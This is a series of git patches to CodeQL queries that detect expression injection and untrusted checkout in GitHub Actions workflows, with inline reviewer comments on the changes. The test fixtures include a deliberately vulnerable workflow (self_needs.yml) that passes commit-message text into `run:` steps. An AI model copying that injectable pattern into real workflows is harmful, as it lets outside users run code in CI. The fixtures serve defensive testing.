SimpleReferenceExpression --- ql/lib/codeql/actions/Ast.qll | 14 ++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 53 ++++++++++++------- .../dataflow/internal/DataFlowPrivate.qll | 2 +- 3 files changed, 42 insertions(+), 27 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 19d1924731a..70424a46f95 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -226,20 +226,20 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { string getFieldName() { result = super.getFieldName() } AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } -class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } -class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } -class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } -class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } -class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } +class MatrixExpression extends SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9a97a1c45b4..1f206c964eb 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -19,24 +19,18 @@ int partialLineLengthSum(string text, int i) { result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(YamlString s, int offset) { +string getADelimitedExpression(YamlString s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) } private newtype TAstNode = TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { - raw = getASimpleReferenceExpression(value, exprOffset) and + raw = getADelimitedExpression(value, exprOffset) and exists(YamlMapping m | ( exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) 
@@ -789,11 +783,29 @@ class RunImpl extends StepImpl { } } +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class ContextExpressionImpl extends ExpressionImpl { +abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); @@ -829,7 +841,7 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsExpressionImpl extends ContextExpressionImpl { +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string stepId; string fieldName; 
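Review bot: The doc comment moved onto `getASimpleReferenceExpression` no longer describes it: the predicate now returns every run of characters from the class in the trimmed input, so `fromJSON(env.time)` (letters, a dot and parentheses) matches in full although the comment says such expressions are not identified. The new characteristic predicate `SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) }` therefore looks close to vacuous, since it holds as soon as the expression contains one character from the class. If the class is meant to hold only expressions that are a single reference, the test has to cover the whole string, for example `SimpleReferenceExpressionImpl() { expression.trim().regexpMatch("[A-Za-z0-9'\"_\\[\\]\\*\\.\\-]+") }` (parentheses left out so function calls are excluded; to be checked against the subclasses' own patterns). The inner comment about obtaining all matches of `${{...}}` is stale as well and could become `// Matches each run of reference characters in the trimmed input.` The class body continues outside the hunk.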
@@ -842,7 +854,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } } @@ -852,7 +864,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsExpressionImpl extends ContextExpressionImpl { +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { JobImpl neededJob; string fieldName; @@ -866,7 +878,10 @@ class NeedsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob().getANeededJob() = neededJob and + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and ( // regular jobs neededJob.getOutputs() = result @@ -882,7 +897,7 @@ class NeedsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsExpressionImpl extends ContextExpressionImpl { +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string jobId; string fieldName; @@ -908,7 +923,7 @@ class JobsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsExpressionImpl extends ContextExpressionImpl { +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { 
@@ -933,7 +948,7 @@ class InputsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvExpressionImpl extends ContextExpressionImpl { +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { @@ -956,7 +971,7 @@ class EnvExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixExpressionImpl extends ContextExpressionImpl { +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; MatrixExpressionImpl() { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index bda55da5c82..f1657717e04 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -271,7 +271,7 @@ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(ContextExpression access | + exists(SimpleReferenceExpression access | ( access instanceof NeedsExpression or access instanceof StepsExpression or From 8e2c1a4f4ed140e5aae014936a19039234f81dc1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:07 +0100 Subject: [PATCH 0101/1267] Expose predicates to check local flow --- .../actions/dataflow/internal/DataFlowPublic.qll | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b..8e8ed5d9280 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -174,3 +174,16 @@ class FieldContent extends Content, TFieldContent { override string toString() { result = name } } + +predicate hasLocalFlow(Node n1, Node n2) { + simpleLocalFlowStep(n1, n2) or + exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) +} + +predicate hasLocalFlowExpr(AstNode n1, AstNode n2) { + exists(Node dn1, Node dn2 | + dn1.asExpr() = n1 and + dn2.asExpr() = n2 and + hasLocalFlow(dn1, dn2) + ) +} From 03277cc24bfa901ad253f2893cc4dbb00e9ad16d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:44 +0100 Subject: [PATCH 0102/1267] Add test for self-referencing jobs --- .../CWE-094/.github/workflows/self_needs.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml new file mode 100644 index 00000000000..afd39605bb3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -0,0 +1,20 @@ +name: Test + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-22.04 + outputs: + job_output: ${{ steps.source.outputs.value }} + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event['head_commit']['message'] }} + find: 'foo' + replace: '' + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} From 7160f08222691a9182870200a6451b353604d0d3 Mon Sep 17 00:00:00 2001 
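Review bot: The new public predicates `hasLocalFlow` and `hasLocalFlowExpr` have no QLDoc, and the names suggest reachability while the body is one step only (`simpleLocalFlowStep` or a single `ctxFieldReadStep`), with no transitive closure. A query that uses them to connect a source to a sink through an intermediate step gets no result, which for a security query is a silent false negative rather than an error. I would state that on the predicate, e.g. `/** Holds if there is a single local flow step, or a single context field read, from n1 to n2. Not transitive. */`, and give `hasLocalFlowExpr` a matching one-line QLDoc saying it is the same relation on the AST nodes behind `asExpr()`.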
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:03:40 +0100 Subject: [PATCH 0103/1267] Update ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- .../query-tests/Security/CWE-829/.github/workflows/auto_ci.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index cb20cfe629b..28ffab637f0 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -68,7 +68,7 @@ jobs: uses: actions/checkout@v3 with: fetch-depth: 0 - ref: ${{ github.event.pull_request.head.ref }} + ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - name: Set up Python ${{ matrix.python-version }} From 3150f24d3fc3c283df4c372925edc97800092b2d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:21:16 +0100 Subject: [PATCH 0104/1267] Update tests and fix regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 11 +++++++++++ .../Security/CWE-094/ExpressionInjection.expected | 13 +++++++++++++ 3 files changed, 26 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1f206c964eb..ffe85b16f93 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -24,8 +24,8 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dfed1edb40a..aa9d9ae2fc4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d22e9833f52..d4fd27b18d4 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | 
@@ -259,6 +270,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 9ca1ac5bb9283d413eefc3bbb686949f69d90a4c Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:02 +0100 Subject: [PATCH 0105/1267] Fix expression regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ffe85b16f93..084474b4020 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -24,8 +24,9 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1) + .trim() } private newtype TAstNode = From 35df9519e14a43946cca042b4286477f95c96b3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:47 +0100 Subject: [PATCH 0106/1267] Support more untrusted checkout cases --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 22 ++-- .../issue_comment_3rd_party_action.yml | 53 ++++++++ .../workflows/issue_comment_direct.yml | 46 +++++++ .../workflows/issue_comment_heuristic.yml | 50 ++++++++ .../workflows/issue_comment_octokit.yml | 114 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 + .../CWE-829/UntrustedCheckout.expected | 9 ++ 7 files changed, 293 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml 
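Review bot: The new pattern in `getADelimitedExpression` ends the match at the first `}}`, so an expression whose string literal contains `}}` is cut short. For `${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }}`, the example in this file's own doc comment, the match stops after `!}}` and the `github.event...` argument is not part of the extracted expression, so the injection queries would presumably never see that reference. Skipping over single-quoted strings would close this, something like `\$\{\{(?:[^}']|'[^']*'|}(?!}))*\}\}` in both `regexpFind` and `regexpCapture` (untested); at minimum the limitation deserves a comment next to the regexp, `// Stops at the first "}}", so a string literal containing "}}" truncates the expression.` The added `.trim()` looks like a no-op, since every match starts with `$` and ends with `}`.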
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 4a0a4b6ade6..a24c80a2f60 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -14,6 +14,7 @@ */ import actions +import codeql.actions.DataFlow /** An If node that contains an actor, user or label check */ class ControlCheck extends If { @@ -23,6 +24,7 @@ class ControlCheck extends If { .regexpFind([ "\\bgithub\\.actor\\b", // actor "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.labels\\b", // label "\\bgithub\\.event\\.label\\.name\\b" // label 
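Review bot: `ControlCheck` appears to treat any `if` that mentions one of the listed contexts as an access check, and the pattern added here for `github.event.comment.user.login` widens that. The rest of the class is outside the hunk, but the visible part is a plain `regexpFind` over the condition text, so a condition that only excludes one account (for example a comparison with `!=` against a bot name) would still suppress the alert through the `not exists(ControlCheck check | ...)` clause in the query. I would make the heuristic explicit in the QLDoc, e.g. `/** An If node whose condition mentions an actor, user or label context. Heuristic: the condition is not evaluated, so a mention alone suppresses the alert. */`.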
@@ -47,22 +49,18 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", - - "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", 
